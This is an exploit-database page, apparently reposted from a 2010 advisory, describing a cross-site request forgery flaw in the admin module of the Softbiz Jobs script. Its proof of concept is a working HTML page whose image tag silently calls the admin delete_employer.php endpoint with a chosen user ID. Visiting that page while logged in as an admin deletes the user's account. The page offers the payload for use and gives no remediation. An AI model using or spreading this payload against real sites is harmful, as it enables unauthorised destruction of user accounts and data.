[ authorization ] [ registration ] [ Ripristina ]
Contattaci
Ci puoi contattare tramite:
0day.today Exploits Market and 0day Exploits Database

Softbiz Jobs CSRF Vulnerability

Autore
Pratul Agrawal
Rischio
[
Security Risk Unsored
]
0day-ID
0day-ID-11037
Categoria
web applications
Data inserimento
23-02-2010
Piattaforma
unsorted
===============================
Softbiz Jobs CSRF Vulnerability
===============================

                     =======================================================================
  
                                         Softbiz Jobs CSRF Vulnerability
                     =======================================================================
  
                                                     by
  
                                               Pratul Agrawal
  
  
# Vulnerability found in- Admin module
  
# company       aksitservices
  
# Credit by     Pratul Agrawal
 
# Download      http://www.softbizscripts.com/
 
# Script        softbizscripts
 
  
  
# Proof of concept
 
Script to delete the registered user through Cross Site request forgery
 
             ...................................................................................................................
 
                        <html>
 
                          <body>
 
                              <img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
 
                          </body>
 
                        </html>
 
 
             ...................................................................................................................
 
 
 
After execution refresh teh page and u can see that user having id=20 get deleted automatically.
 
  
#If you have any questions, comments, or concerns, feel free to contact me. 



#  0day.today [2024-03-28]  #